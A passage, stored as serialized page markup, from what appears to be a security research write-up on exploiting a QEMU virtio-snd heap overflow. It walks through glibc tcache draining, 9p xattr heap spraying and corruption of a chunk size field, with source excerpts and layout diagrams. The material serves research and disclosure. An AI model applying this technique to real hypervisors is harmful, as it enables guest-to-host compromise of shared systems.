7",{"type":26,"tag":137,"props":130632,"children":130633},{"style":5601},[130634],{"type":32,"value":5604},{"type":26,"tag":137,"props":130636,"children":130637},{"class":5559,"line":5909},[130638,130643,130647],{"type":26,"tag":137,"props":130639,"children":130640},{"style":5601},[130641],{"type":32,"value":130642},"    V9fsFidState ",{"type":26,"tag":137,"props":130644,"children":130645},{"style":5590},[130646],{"type":32,"value":7152},{"type":26,"tag":137,"props":130648,"children":130649},{"style":5601},[130650],{"type":32,"value":130651},"file_fidp;\n",{"type":26,"tag":137,"props":130653,"children":130654},{"class":5559,"line":5930},[130655,130659,130663],{"type":26,"tag":137,"props":130656,"children":130657},{"style":5601},[130658],{"type":32,"value":130642},{"type":26,"tag":137,"props":130660,"children":130661},{"style":5590},[130662],{"type":32,"value":7152},{"type":26,"tag":137,"props":130664,"children":130665},{"style":5601},[130666],{"type":32,"value":130667},"xattr_fidp;\n",{"type":26,"tag":137,"props":130669,"children":130670},{"class":5559,"line":5939},[130671,130676,130680,130685,130689],{"type":26,"tag":137,"props":130672,"children":130673},{"style":5601},[130674],{"type":32,"value":130675},"    V9fsPDU ",{"type":26,"tag":137,"props":130677,"children":130678},{"style":5590},[130679],{"type":32,"value":7152},{"type":26,"tag":137,"props":130681,"children":130682},{"style":5601},[130683],{"type":32,"value":130684},"pdu ",{"type":26,"tag":137,"props":130686,"children":130687},{"style":5590},[130688],{"type":32,"value":289},{"type":26,"tag":137,"props":130690,"children":130691},{"style":5601},[130692],{"type":32,"value":130693}," opaque;\n",{"type":26,"tag":137,"props":130695,"children":130696},{"class":5559,"line":6191},[130697],{"type":26,"tag":137,"props":130698,"children":130699},{"emptyLinePlaceholder":18},[130700],{"type":32,"value":6276},{"type":26,"tag":137,"props":130702,"children":130703},{"class":5559,"line":6208},[130704,130709,130713,130717],{"type":26,"tag":137,"props":130705,"children":130706},{"style":5682},[130707],{"type":32,"value":130708},"    v9fs_string_init",{"type":26,"tag":137,"props":130710,"children":130711},{"style":5601},[130712],{"type":32,"value":165},{"type":26,"tag":137,"props":130714,"children":130715},{"style":5590},[130716],{"type":32,"value":5694},{"type":26,"tag":137,"props":130718,"children":130719},{"style":5601},[130720],{"type":32,"value":130721},"name);\n",{"type":26,"tag":137,"props":130723,"children":130724},{"class":5559,"line":6225},[130725,130730,130734,130739,130744,130749,130753,130757,130762,130766,130771,130775,130779,130783],{"type":26,"tag":137,"props":130726,"children":130727},{"style":5601},[130728],{"type":32,"value":130729},"    err ",{"type":26,"tag":137,"props":130731,"children":130732},{"style":5590},[130733],{"type":32,"value":289},{"type":26,"tag":137,"props":130735,"children":130736},{"style":5682},[130737],{"type":32,"value":130738}," pdu_unmarshal",{"type":26,"tag":137,"props":130740,"children":130741},{"style":5601},[130742],{"type":32,"value":130743},"(pdu, offset, ",{"type":26,"tag":137,"props":130745,"children":130746},{"style":6837},[130747],{"type":32,"value":130748},"\"dsqd\"",{"type":26,"tag":137,"props":130750,"children":130751},{"style":5601},[130752],{"type":32,"value":1108},{"type":26,"tag":137,"props":130754,"children":130755},{"style":5590},[130756],{"type":32,"value":5694},{"type":26,"tag":137,"props":130758,"children":130759},{"style":5601},[130760],{"type":32,"value":130761},"fid, ",{"type":26,"tag":137,"props":130763,"children":130764},{"style":5590},[130765],{"type":32,"value":5694},{"type":26,"tag":137,"props":130767,"children":130768},{"style":5601},[130769],{"type":32,"value":130770},"name, ",{"type":26,"tag":137,"props":130772,"children":130773},{"style":5590},[130774],{"type":32,"value":5694},{"type":26,"tag":137,"props":130776,"children":130777},{"style":5601},[130778],{"type":32,"value":129521},{"type":26,"tag":137,"props":130780,"children":130781},{"style":5590},[130782],{"type":32,"value":5694},{"type":26,"tag":137,"props":130784,"children":130785},{"style":5601},[130786],{"type":32,"value":130787},"flags);\n",{"type":26,"tag":137,"props":130789,"children":130790},{"class":5559,"line":6238},[130791,130795,130800,130804,130808],{"type":26,"tag":137,"props":130792,"children":130793},{"style":5610},[130794],{"type":32,"value":14870},{"type":26,"tag":137,"props":130796,"children":130797},{"style":5601},[130798],{"type":32,"value":130799}," (err ",{"type":26,"tag":137,"props":130801,"children":130802},{"style":5590},[130803],{"type":32,"value":8391},{"type":26,"tag":137,"props":130805,"children":130806},{"style":5626},[130807],{"type":32,"value":5629},{"type":26,"tag":137,"props":130809,"children":130810},{"style":5601},[130811],{"type":32,"value":17395},{"type":26,"tag":137,"props":130813,"children":130814},{"class":5559,"line":6247},[130815,130820],{"type":26,"tag":137,"props":130816,"children":130817},{"style":5610},[130818],{"type":32,"value":130819},"        goto",{"type":26,"tag":137,"props":130821,"children":130822},{"style":5601},[130823],{"type":32,"value":130824}," out_nofid;\n",{"type":26,"tag":137,"props":130826,"children":130827},{"class":5559,"line":6270},[130828],{"type":26,"tag":137,"props":130829,"children":130830},{"style":5601},[130831],{"type":32,"value":5945},{"type":26,"tag":137,"props":130833,"children":130834},{"class":5559,"line":6279},[130835],{"type":26,"tag":137,"props":130836,"children":130837},{"emptyLinePlaceholder":18},[130838],{"type":32,"value":6276},{"type":26,"tag":137,"props":130840,"children":130841},{"class":5559,"line":6288},[130842],{"type":26,"tag":137,"props":130843,"children":130844},{"style":5601},[130845],{"type":32,"value":107381},{"type":26,"tag":137,"props":130847,"children":130848},{"class":5559,"line":6355},[130849],{"type":26,"tag":137,"props":130850,"children":130851},{"emptyLinePlaceholder":18},[130852],{"type":32,"value":6276},{"type":26,"tag":137,"props":130854,"children":130855},{"class":5559,"line":6363},[130856,130860,130864,130868],{"type":26,"tag":137,"props":130857,"children":130858},{"style":5610},[130859],{"type":32,"value":14870},{"type":26,"tag":137,"props":130861,"children":130862},{"style":5601},[130863],{"type":32,"value":129622},{"type":26,"tag":137,"props":130865,"children":130866},{"style":5590},[130867],{"type":32,"value":13052},{"type":26,"tag":137,"props":130869,"children":130870},{"style":5601},[130871],{"type":32,"value":130872}," P9_XATTR_SIZE_MAX) {\n",{"type":26,"tag":137,"props":130874,"children":130875},{"class":5559,"line":6393},[130876,130881,130885,130889],{"type":26,"tag":137,"props":130877,"children":130878},{"style":5601},[130879],{"type":32,"value":130880},"        err ",{"type":26,"tag":137,"props":130882,"children":130883},{"style":5590},[130884],{"type":32,"value":289},{"type":26,"tag":137,"props":130886,"children":130887},{"style":5590},[130888],{"type":32,"value":53858},{"type":26,"tag":137,"props":130890,"children":130891},{"style":5601},[130892],{"type":32,"value":130893},"E2BIG;\n",{"type":26,"tag":137,"props":130895,"children":130896},{"class":5559,"line":6401},[130897,130901],{"type":26,"tag":137,"props":130898,"children":130899},{"style":5610},[130900],{"type":32,"value":130819},{"type":26,"tag":137,"props":130902,"children":130903},{"style":5601},[130904],{"type":32,"value":130824},{"type":26,"tag":137,"props":130906,"children":130907},{"class":5559,"line":6433},[130908],{"type":26,"tag":137,"props":130909,"children":130910},{"style":5601},[130911],{"type":32,"value":5945},{"type":26,"tag":137,"props":130913,"children":130914},{"class":5559,"line":6441},[130915],{"type":26,"tag":137,"props":130916,"children":130917},{"emptyLinePlaceholder":18},[130918],{"type":32,"value":6276},{"type":26,"tag":137,"props":130920,"children":130921},{"class":5559,"line":6501},[130922],{"type":26,"tag":137,"props":130923,"children":130924},{"style":5601},[130925],{"type":32,"value":107381},{"type":26,"tag":137,"props":130927,"children":130928},{"class":5559,"line":11634},[130929],{"type":26,"tag":137,"props":130930,"children":130931},{"emptyLinePlaceholder":18},[130932],{"type":32,"value":6276},{"type":26,"tag":137,"props":130934,"children":130935},{"class":5559,"line":11652},[130936,130940,130944,130948,130953,130957,130961,130965,130970,130974,130978],{"type":26,"tag":137,"props":130937,"children":130938},{"style":5682},[130939],{"type":32,"value":130708},{"type":26,"tag":137,"props":130941,"children":130942},{"style":5601},[130943],{"type":32,"value":165},{"type":26,"tag":137,"props":130945,"children":130946},{"style":5590},[130947],{"type":32,"value":5694},{"type":26,"tag":137,"props":130949,"children":130950},{"style":5584},[130951],{"type":32,"value":130952},"xattr_fidp",{"type":26,"tag":137,"props":130954,"children":130955},{"style":5601},[130956],{"type":32,"value":16348},{"type":26,"tag":137,"props":130958,"children":130959},{"style":5584},[130960],{"type":32,"value":39578},{"type":26,"tag":137,"props":130962,"children":130963},{"style":5601},[130964],{"type":32,"value":470},{"type":26,"tag":137,"props":130966,"children":130967},{"style":5584},[130968],{"type":32,"value":130969},"xattr",{"type":26,"tag":137,"props":130971,"children":130972},{"style":5601},[130973],{"type":32,"value":470},{"type":26,"tag":137,"props":130975,"children":130976},{"style":5584},[130977],{"type":32,"value":51100},{"type":26,"tag":137,"props":130979,"children":130980},{"style":5601},[130981],{"type":32,"value":6430},{"type":26,"tag":137,"props":130983,"children":130984},{"class":5559,"line":11697},[130985,130990,130994,130998,131002,131006,131010,131014,131018,131022,131026,131030,131034],{"type":26,"tag":137,"props":130986,"children":130987},{"style":5682},[130988],{"type":32,"value":130989},"    v9fs_string_copy",{"type":26,"tag":137,"props":130991,"children":130992},{"style":5601},[130993],{"type":32,"value":165},{"type":26,"tag":137,"props":130995,"children":130996},{"style":5590},[130997],{"type":32,"value":5694},{"type":26,"tag":137,"props":130999,"children":131000},{"style":5584},[131001],{"type":32,"value":130952},{"type":26,"tag":137,"props":131003,"children":131004},{"style":5601},[131005],{"type":32,"value":16348},{"type":26,"tag":137,"props":131007,"children":131008},{"style":5584},[131009],{"type":32,"value":39578},{"type":26,"tag":137,"props":131011,"children":131012},{"style":5601},[131013],{"type":32,"value":470},{"type":26,"tag":137,"props":131015,"children":131016},{"style":5584},[131017],{"type":32,"value":130969},{"type":26,"tag":137,"props":131019,"children":131020},{"style":5601},[131021],{"type":32,"value":470},{"type":26,"tag":137,"props":131023,"children":131024},{"style":5584},[131025],{"type":32,"value":51100},{"type":26,"tag":137,"props":131027,"children":131028},{"style":5601},[131029],{"type":32,"value":1108},{"type":26,"tag":137,"props":131031,"children":131032},{"style":5590},[131033],{"type":32,"value":5694},{"type":26,"tag":137,"props":131035,"children":131036},{"style":5601},[131037],{"type":32,"value":130721},{"type":26,"tag":137,"props":131039,"children":131040},{"class":5559,"line":11803},[131041,131046,131050,131054,131058,131062,131066,131070,131074,131078],{"type":26,"tag":137,"props":131042,"children":131043},{"style":5584},[131044],{"type":32,"value":131045},"    xattr_fidp",{"type":26,"tag":137,"props":131047,"children":131048},{"style":5601},[131049],{"type":32,"value":16348},{"type":26,"tag":137,"props":131051,"children":131052},{"style":5584},[131053],{"type":32,"value":39578},{"type":26,"tag":137,"props":131055,"children":131056},{"style":5601},[131057],{"type":32,"value":470},{"type":26,"tag":137,"props":131059,"children":131060},{"style":5584},[131061],{"type":32,"value":130969},{"type":26,"tag":137,"props":131063,"children":131064},{"style":5601},[131065],{"type":32,"value":470},{"type":26,"tag":137,"props":131067,"children":131068},{"style":5584},[131069],{"type":32,"value":41748},{"type":26,"tag":137,"props":131071,"children":131072},{"style":5590},[131073],{"type":32,"value":5593},{"type":26,"tag":137,"props":131075,"children":131076},{"style":5682},[131077],{"type":32,"value":126725},{"type":26,"tag":137,"props":131079,"children":131080},{"style":5601},[131081],{"type":32,"value":131082},"(size);\n",{"type":26,"tag":137,"props":131084,"children":131085},{"class":5559,"line":26089},[131086],{"type":26,"tag":137,"props":131087,"children":131088},{"style":5601},[131089],{"type":32,"value":6507},{"type":26,"tag":35,"props":131091,"children":131092},{},[131093,131095,131100,131102,131107,131108,131113,131115,131120],{"type":32,"value":131094},"Because the ",{"type":26,"tag":130,"props":131096,"children":131098},{"className":131097},[],[131099],{"type":32,"value":130456},{"type":32,"value":131101}," field is handled as a string, embedded null bytes are not preserved, which makes it less useful for our purposes. It also introduces some extra allocation noise into the heap, since creating an xattr allocates both ",{"type":26,"tag":130,"props":131103,"children":131105},{"className":131104},[],[131106],{"type":32,"value":130456},{"type":32,"value":3339},{"type":26,"tag":130,"props":131109,"children":131111},{"className":131110},[],[131112],{"type":32,"value":130463},{"type":32,"value":131114},", not just the ",{"type":26,"tag":130,"props":131116,"children":131118},{"className":131117},[],[131119],{"type":32,"value":130463},{"type":32,"value":131121}," we actually care about. But we will get around this later in the blog post.",{"type":26,"tag":35,"props":131123,"children":131124},{},[131125,131126,131131],{"type":32,"value":19206},{"type":26,"tag":130,"props":131127,"children":131129},{"className":131128},[],[131130],{"type":32,"value":130463},{"type":32,"value":131132}," field, however, is much more interesting: it gives us a guest-controlled heap allocation of an arbitrary size. Each of these allocations is tied to its own xattr FID, which means it stays alive for as long as that FID remains live. In practice, this gives us a large number of persistent host-side heap objects that we can manage individually.",{"type":26,"tag":35,"props":131134,"children":131135},{},[131136,131138,131143,131145,131151,131153,131159,131161,131167],{"type":32,"value":131137},"Once allocated, we can write arbitrary bytes into the ",{"type":26,"tag":130,"props":131139,"children":131141},{"className":131140},[],[131142],{"type":32,"value":130463},{"type":32,"value":131144}," buffer through a ",{"type":26,"tag":130,"props":131146,"children":131148},{"className":131147},[],[131149],{"type":32,"value":131150},"P9_TWRITE",{"type":32,"value":131152}," request on the corresponding xattr FID. We can also read the contents back with ",{"type":26,"tag":130,"props":131154,"children":131156},{"className":131155},[],[131157],{"type":32,"value":131158},"P9_TREAD",{"type":32,"value":131160},", which is useful later when turning overlap into stronger primitives. Finally, we can free any individual allocation at any time by issuing a ",{"type":26,"tag":130,"props":131162,"children":131164},{"className":131163},[],[131165],{"type":32,"value":131166},"P9_TCLUNK",{"type":32,"value":131168}," request on that same FID.",{"type":26,"tag":35,"props":131170,"children":131171},{},[131172,131174,131180],{"type":32,"value":131173},"This gives us a very strong heap shaping primitive in QEMU - allocate on demand, choose the size precisely (up to ",{"type":26,"tag":130,"props":131175,"children":131177},{"className":131176},[],[131178],{"type":32,"value":131179},"65536",{"type":32,"value":131181}," bytes, which is more than enough here), fully control the contents of the allocation, keep it alive as long as needed, and free it selectively later.",{"type":26,"tag":118,"props":131183,"children":131185},{"id":131184},"setting-the-heap-layout",[131186],{"type":32,"value":131187},"Setting the Heap Layout",{"type":26,"tag":35,"props":131189,"children":131190},{},[131191,131193,131198],{"type":32,"value":131192},"Ideally, we want a contiguous heap region consisting only of ",{"type":26,"tag":130,"props":131194,"children":131196},{"className":131195},[],[131197],{"type":32,"value":130463},{"type":32,"value":131199}," allocations, like this:",{"type":26,"tag":5512,"props":131201,"children":131203},{"code":131202},"   0x200      0x200      0x200      0x200      0x200\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value B | .value C | .value D | .value E |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[131204],{"type":26,"tag":130,"props":131205,"children":131206},{"__ignoreMap":7},[131207],{"type":32,"value":131202},{"type":26,"tag":35,"props":131209,"children":131210},{},[131211,131213,131218,131220,131225,131227,131232],{"type":32,"value":131212},"This lets us later create holes by freeing every other ",{"type":26,"tag":130,"props":131214,"children":131216},{"className":131215},[],[131217],{"type":32,"value":130463},{"type":32,"value":131219}," allocation. Those freed chunks enter the freelist, allowing the overflowing virtio-snd buffer to be allocated into one of those holes and overflow into the ",{"type":26,"tag":130,"props":131221,"children":131223},{"className":131222},[],[131224],{"type":32,"value":126812},{"type":32,"value":131226}," field of the next live ",{"type":26,"tag":130,"props":131228,"children":131230},{"className":131229},[],[131231],{"type":32,"value":130463},{"type":32,"value":131233}," chunk.",{"type":26,"tag":35,"props":131235,"children":131236},{},[131237],{"type":32,"value":131238},"Of course, we do not know the initial state of the heap. In practice, it is fragmented and already contains many freelist entries. Fortunately, this is not a problem for glibc, since the allocator is deterministic. By allocating enough chunks of the size we want, malloc will first consume any suitable entries already present in the freelist. Once those are exhausted, subsequent allocations will be served from the top chunk in a contiguous fashion, giving us the continuous region we need.",{"type":26,"tag":35,"props":131240,"children":131241},{},[131242,131244,131249,131251,131256,131258,131263,131265,131270],{"type":32,"value":131243},"As mentioned earlier, ",{"type":26,"tag":130,"props":131245,"children":131247},{"className":131246},[],[131248],{"type":32,"value":130500},{"type":32,"value":131250}," always allocates two chunks: one for ",{"type":26,"tag":130,"props":131252,"children":131254},{"className":131253},[],[131255],{"type":32,"value":130456},{"type":32,"value":131257}," and one for ",{"type":26,"tag":130,"props":131259,"children":131261},{"className":131260},[],[131262],{"type":32,"value":130463},{"type":32,"value":131264},". We want to avoid having ",{"type":26,"tag":130,"props":131266,"children":131268},{"className":131267},[],[131269],{"type":32,"value":130456},{"type":32,"value":131271}," chunks inside our main contiguous region. There are two ways to approach this:",{"type":26,"tag":4820,"props":131273,"children":131274},{},[131275,131287],{"type":26,"tag":3430,"props":131276,"children":131277},{},[131278,131280,131285],{"type":32,"value":131279},"Make ",{"type":26,"tag":130,"props":131281,"children":131283},{"className":131282},[],[131284],{"type":32,"value":130456},{"type":32,"value":131286}," larger than the mmap threshold, so it is allocated from a separate mapping rather than from the main heap. This would give us the layout we want, but at the cost of dramatically increasing memory usage during heap spraying.",{"type":26,"tag":3430,"props":131288,"children":131289},{},[131290,131292,131297,131299,131304,131306,131311],{"type":32,"value":131291},"Prepare a separate region whose sole purpose is to absorb ",{"type":26,"tag":130,"props":131293,"children":131295},{"className":131294},[],[131296],{"type":32,"value":130456},{"type":32,"value":131298},"-sized allocations. Later, when we start building the main contiguous region, malloc will satisfy ",{"type":26,"tag":130,"props":131300,"children":131302},{"className":131301},[],[131303],{"type":32,"value":130456},{"type":32,"value":131305}," allocations from that separate freelist instead of placing them next to our ",{"type":26,"tag":130,"props":131307,"children":131309},{"className":131308},[],[131310],{"type":32,"value":130463},{"type":32,"value":131312}," chunks.",{"type":26,"tag":21485,"props":131314,"children":131316},{"id":131315},"separating-name-allocations",[131317],{"type":32,"value":131318},"Separating .name allocations",{"type":26,"tag":35,"props":131320,"children":131321},{},[131322,131324,131329,131331,131336],{"type":32,"value":131323},"We chose the second option. However, it is not as simple as issuing ",{"type":26,"tag":130,"props":131325,"children":131327},{"className":131326},[],[131328],{"type":32,"value":130500},{"type":32,"value":131330}," for N ",{"type":26,"tag":130,"props":131332,"children":131334},{"className":131333},[],[131335],{"type":32,"value":130456},{"type":32,"value":131337},"-sized allocations and then freeing them.",{"type":26,"tag":35,"props":131339,"children":131340},{},[131341,131343,131348,131349,131354,131355,131360,131362,131367,131369,131374],{"type":32,"value":131342},"At this point, we already know that ",{"type":26,"tag":130,"props":131344,"children":131346},{"className":131345},[],[131347],{"type":32,"value":130500},{"type":32,"value":131250},{"type":26,"tag":130,"props":131350,"children":131352},{"className":131351},[],[131353],{"type":32,"value":130456},{"type":32,"value":131257},{"type":26,"tag":130,"props":131356,"children":131358},{"className":131357},[],[131359],{"type":32,"value":130463},{"type":32,"value":131361},". If we simply call it with ",{"type":26,"tag":130,"props":131363,"children":131365},{"className":131364},[],[131366],{"type":32,"value":130463},{"type":32,"value":131368}," sized the same as ",{"type":26,"tag":130,"props":131370,"children":131372},{"className":131371},[],[131373],{"type":32,"value":130456},{"type":32,"value":131375},", we get a layout like this:",{"type":26,"tag":5512,"props":131377,"children":131379},{"code":131378},"    0x20       0x20       0x20       0x20       0x20\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .name  A | .value A | .name  B | .value B | .name  C |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[131380],{"type":26,"tag":130,"props":131381,"children":131382},{"__ignoreMap":7},[131383],{"type":32,"value":131378},{"type":26,"tag":35,"props":131385,"children":131386},{},[131387,131389,131394,131396,131402,131404,131410,131412,131417,131419,131424,131426,131431],{"type":32,"value":131388},"With that heap state, issuing a ",{"type":26,"tag":130,"props":131390,"children":131392},{"className":131391},[],[131393],{"type":32,"value":131166},{"type":32,"value":131395}," request would first free ",{"type":26,"tag":130,"props":131397,"children":131399},{"className":131398},[],[131400],{"type":32,"value":131401},".name A",{"type":32,"value":131403}," and then ",{"type":26,"tag":130,"props":131405,"children":131407},{"className":131406},[],[131408],{"type":32,"value":131409},".value A",{"type":32,"value":131411},". When ",{"type":26,"tag":130,"props":131413,"children":131415},{"className":131414},[],[131416],{"type":32,"value":131409},{"type":32,"value":131418}," is freed, the allocator sees that the preceding chunk ",{"type":26,"tag":130,"props":131420,"children":131422},{"className":131421},[],[131423],{"type":32,"value":131401},{"type":32,"value":131425}," is already free and immediately consolidates the two. As a result, instead of ending up with many reusable ",{"type":26,"tag":130,"props":131427,"children":131429},{"className":131428},[],[131430],{"type":32,"value":130456},{"type":32,"value":131432},"-sized chunks in the freelist, we would just create a large consolidated free chunk, which is not what we want.",{"type":26,"tag":35,"props":131434,"children":131435},{},[131436],{"type":32,"value":131437},"To avoid that, we take advantage of the fact that chunks freed into tcache are not consolidated. It is also important to note that tcache maintains a separate freelist for each size class within the tcache range, and in this glibc version each such freelist can hold up to 16 entries.",{"type":26,"tag":35,"props":131439,"children":131440},{},[131441,131443,131448,131450,131455,131457,131462,131464,131470,131472,131477,131479,131485],{"type":32,"value":131442},"We begin by draining the tcache freelist for every relevant size class by allocating 16 chunks of each size. Throughout this process, the ",{"type":26,"tag":130,"props":131444,"children":131446},{"className":131445},[],[131447],{"type":32,"value":130456},{"type":32,"value":131449}," allocation remains fixed at size ",{"type":26,"tag":130,"props":131451,"children":131453},{"className":131452},[],[131454],{"type":32,"value":107647},{"type":32,"value":131456},". We first allocate 16 xattrs whose ",{"type":26,"tag":130,"props":131458,"children":131460},{"className":131459},[],[131461],{"type":32,"value":130463},{"type":32,"value":131463}," size is ",{"type":26,"tag":130,"props":131465,"children":131467},{"className":131466},[],[131468],{"type":32,"value":131469},"0x30",{"type":32,"value":131471},". After that, we allocate another 16 xattrs, this time with ",{"type":26,"tag":130,"props":131473,"children":131475},{"className":131474},[],[131476],{"type":32,"value":130463},{"type":32,"value":131478}," size ",{"type":26,"tag":130,"props":131480,"children":131482},{"className":131481},[],[131483],{"type":32,"value":131484},"0x40",{"type":32,"value":131486},", and continue in the same way for each tcache size class.",{"type":26,"tag":35,"props":131488,"children":131489},{},[131490],{"type":32,"value":131491},"This yields the following layout:",{"type":26,"tag":5512,"props":131493,"children":131495},{"code":131494},"    0x20        0x30         0x20        0x30\n+---------+--------------+---------+--------------+- - - - -\n|         |              |         |              |\n| .name A |   .value A   | .name B |   .value B   |  . . .\n|         |              |         |              |\n+---------+--------------+---------+--------------+- - - - -\n\n    0x20          0x40           0x20           0x40\n+---------+------------------+---------+------------------+- - - - -\n|         |                  |         |                  |\n| .name C |     .value C     | .name D |     .value D     |  . . .\n|         |                  |         |                  |\n+---------+------------------+---------+------------------+- - - - -\n",[131496],{"type":26,"tag":130,"props":131497,"children":131498},{"__ignoreMap":7},[131499],{"type":32,"value":131494},{"type":26,"tag":35,"props":131501,"children":131502},{},[131503,131505,131510,131512,131517,131519,131524,131526,131531,131533,131538,131540,131545,131546,131551,131553,131558,131560,131565,131567,131572,131574,131579,131581,131586],{"type":32,"value":131504},"At this point, we can free all allocations created during this phase. Because we emptied every tcache freelist, the first 16 ",{"type":26,"tag":130,"props":131506,"children":131508},{"className":131507},[],[131509],{"type":32,"value":130456},{"type":32,"value":131511}," chunks end up in the ",{"type":26,"tag":130,"props":131513,"children":131515},{"className":131514},[],[131516],{"type":32,"value":107647},{"type":32,"value":131518}," tcache bin, along with the interleaved ",{"type":26,"tag":130,"props":131520,"children":131522},{"className":131521},[],[131523],{"type":32,"value":130463},{"type":32,"value":131525}," chunks of size ",{"type":26,"tag":130,"props":131527,"children":131529},{"className":131528},[],[131530],{"type":32,"value":131469},{"type":32,"value":131532},". The next 16 ",{"type":26,"tag":130,"props":131534,"children":131536},{"className":131535},[],[131537],{"type":32,"value":130456},{"type":32,"value":131539}," chunks are interleaved with ",{"type":26,"tag":130,"props":131541,"children":131543},{"className":131542},[],[131544],{"type":32,"value":130463},{"type":32,"value":131525},{"type":26,"tag":130,"props":131547,"children":131549},{"className":131548},[],[131550],{"type":32,"value":131484},{"type":32,"value":131552},"; when freed, those ",{"type":26,"tag":130,"props":131554,"children":131556},{"className":131555},[],[131557],{"type":32,"value":130463},{"type":32,"value":131559}," chunks also go into their corresponding tcache bin instead of consolidating with the adjacent free ",{"type":26,"tag":130,"props":131561,"children":131563},{"className":131562},[],[131564],{"type":32,"value":130456},{"type":32,"value":131566}," chunks. Repeating this across all tcache sizes leaves us with a large region of free ",{"type":26,"tag":130,"props":131568,"children":131570},{"className":131569},[],[131571],{"type":32,"value":130456},{"type":32,"value":131573},"-sized chunks that will later be served to the ",{"type":26,"tag":130,"props":131575,"children":131577},{"className":131576},[],[131578],{"type":32,"value":130456},{"type":32,"value":131580}," allocations of the main contiguous spray - leaving us with the desired layout of adjacent ",{"type":26,"tag":130,"props":131582,"children":131584},{"className":131583},[],[131585],{"type":32,"value":130463},{"type":32,"value":131312},{"type":26,"tag":118,"props":131588,"children":131590},{"id":131589},"corrupting-the-size",[131591],{"type":32,"value":131592},"Corrupting the Size",{"type":26,"tag":35,"props":131594,"children":131595},{},[131596,131598,131603,131605,131610,131612,131617,131619,131624,131625,131630],{"type":32,"value":131597},"The input format is guest-controlled, and we choose ",{"type":26,"tag":130,"props":131599,"children":131601},{"className":131600},[],[131602],{"type":32,"value":6012},{"type":32,"value":131604}," (unsigned 8-bit PCM). As noted earlier, silence in ",{"type":26,"tag":130,"props":131606,"children":131608},{"className":131607},[],[131609],{"type":32,"value":6012},{"type":32,"value":131611}," is centered at ",{"type":26,"tag":130,"props":131613,"children":131615},{"className":131614},[],[131616],{"type":32,"value":32033},{"type":32,"value":131618}," (rather than ",{"type":26,"tag":130,"props":131620,"children":131622},{"className":131621},[],[131623],{"type":32,"value":128718},{"type":32,"value":128705},{"type":26,"tag":130,"props":131626,"children":131628},{"className":131627},[],[131629],{"type":32,"value":128696},{"type":32,"value":131631},"), which biases this uncontrolled overflow toward larger byte values and increases the chance that the corrupted size grows.",{"type":26,"tag":35,"props":131633,"children":131634},{},[131635,131637,131642],{"type":32,"value":131636},"As we already concluded, ",{"type":26,"tag":130,"props":131638,"children":131640},{"className":131639},[],[131641],{"type":32,"value":128161},{"type":32,"value":131643}," is called with the amount:",{"type":26,"tag":5512,"props":131645,"children":131647},{"code":131646},"MIN(available, (stream->params.period_bytes - buffer->size))\n",[131648],{"type":26,"tag":130,"props":131649,"children":131650},{"__ignoreMap":7},[131651],{"type":32,"value":131646},{"type":26,"tag":35,"props":131653,"children":131654},{},[131655,131657,131662,131664,131669],{"type":32,"value":131656},"And as mentioned earlier, ",{"type":26,"tag":130,"props":131658,"children":131660},{"className":131659},[],[131661],{"type":32,"value":128192},{"type":32,"value":131663}," is fully guest-controlled, so we can set it such that the overflow reaches exactly far enough to overwrite only the lowest byte of the next chunk's ",{"type":26,"tag":130,"props":131665,"children":131667},{"className":131666},[],[131668],{"type":32,"value":126812},{"type":32,"value":60927},{"type":26,"tag":35,"props":131671,"children":131672},{},[131673,131675,131680,131682,131687],{"type":32,"value":131674},"With the desired heap layout of repeated ",{"type":26,"tag":130,"props":131676,"children":131678},{"className":131677},[],[131679],{"type":32,"value":130365},{"type":32,"value":131681},"-sized ",{"type":26,"tag":130,"props":131683,"children":131685},{"className":131684},[],[131686],{"type":32,"value":130463},{"type":32,"value":131688}," chunks in place, we can then free every other one:",{"type":26,"tag":5512,"props":131690,"children":131692},{"code":131691},"               Free                  Free\n+----------+----------+----------+----------+----------+\n|          |..........|          |..........|          |\n| .value A |..........| .value C |..........| .value E |\n|          |..........|          |..........|          |\n+----------+----------+----------+----------+----------+\n",[131693],{"type":26,"tag":130,"props":131694,"children":131695},{"__ignoreMap":7},[131696],{"type":32,"value":131691},{"type":26,"tag":35,"props":131698,"children":131699},{},[131700,131702,131707],{"type":32,"value":131701},"We then allocate the overflowing virtio-snd buffer into one of those holes, start the stream, and let it overflow into the size field of the ",{"type":26,"tag":130,"props":131703,"children":131705},{"className":131704},[],[131706],{"type":32,"value":130463},{"type":32,"value":131708}," chunk directly next to it:",{"type":26,"tag":5512,"props":131710,"children":131712},{"code":131711},"           +----------+\n           |          |              Free\n+----------|  buffer  |----------+----------+----------+\n|          |          |          |..........|          |\n| .value A +----------+ .value C |..........| .value E |\n|          |          |          |..........|          |\n+----------+          +----------+----------+----------+\n",[131713],{"type":26,"tag":130,"props":131714,"children":131715},{"__ignoreMap":7},[131716],{"type":32,"value":131711},{"type":26,"tag":35,"props":131718,"children":131719},{},[131720,131722,131727,131729,131734],{"type":32,"value":131721},"After the overflow, the virtio-snd buffer is freed by QEMU. We then refill all of the holes created for the virtio-snd buffer by allocating new ",{"type":26,"tag":130,"props":131723,"children":131725},{"className":131724},[],[131726],{"type":32,"value":130365},{"type":32,"value":131728},"-sized chunks in their place. At that point, we are left with a layout similar to the original one, except that one ",{"type":26,"tag":130,"props":131730,"children":131732},{"className":131731},[],[131733],{"type":32,"value":130463},{"type":32,"value":131735}," chunk now has a corrupted and likely oversized size field:",{"type":26,"tag":5512,"props":131737,"children":131739},{"code":131738},"                      Oversized chunk\n                             |\n                      +------+------+\n                      |             |\n                      v             v\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value X | .value C | .value Y | .value E |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[131740],{"type":26,"tag":130,"props":131741,"children":131742},{"__ignoreMap":7},[131743],{"type":32,"value":131738},{"type":26,"tag":35,"props":131745,"children":131746},{},[131747,131749,131754],{"type":32,"value":131748},"At this point, we can free the chunks left over from the initial contiguous spray. Because one chunk now has a corrupted, larger size field, freeing it causes a single oversized chunk to be inserted into one of the tcache bins in the range ",{"type":26,"tag":130,"props":131750,"children":131752},{"className":131751},[],[131753],{"type":32,"value":130380},{"type":32,"value":7072},{"type":26,"tag":5512,"props":131756,"children":131758},{"code":131757},"                           Free\n                        0x210-0x2f0\n                             |\n                      +------+------+\n   Free               |             |          Free\n   0x200              v             v          